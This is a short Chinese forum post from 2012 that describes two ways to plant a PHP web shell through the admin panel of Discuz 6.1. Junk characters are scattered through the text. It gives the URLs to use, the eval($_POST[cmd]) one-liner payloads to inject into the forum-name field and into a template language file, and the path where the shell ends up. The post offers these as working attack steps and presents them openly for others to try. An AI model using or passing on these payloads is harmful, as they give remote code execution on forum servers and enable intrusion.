discuz6.1两种方法后台拿shell
% y3 B8 u4 }1 Z8 I) ^; ^" r好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
* B0 n% t1 `3 b: {' @1:
& Y! e" [* v1 ^2 N! B. o$ j1 f8 lhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
+ D& H6 _$ v. J: N7 ]) P% Xadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell- \6 N' K4 |& X5 @7 C, X7 e
<?php eval($_POST[cmd]);?>2 Q. D+ S, u, P$ i0 \$ n
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php7 P9 F0 G: C! y( j7 ^1 V
4 Q, E: \9 x6 x& Y: _ }0 S% e. s6 G `8 c
2:后台模板管理--默认模板套系--详情2 z+ S! U4 F% [4 ]0 o$ o
templates/default/actions.lang.php+ [" m3 J8 ]: w
jhackj\\');eval($_POST[cmd])?>;//
$ e' z& w2 U; ?1 ?! G" B
8 h U* b2 d. E利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对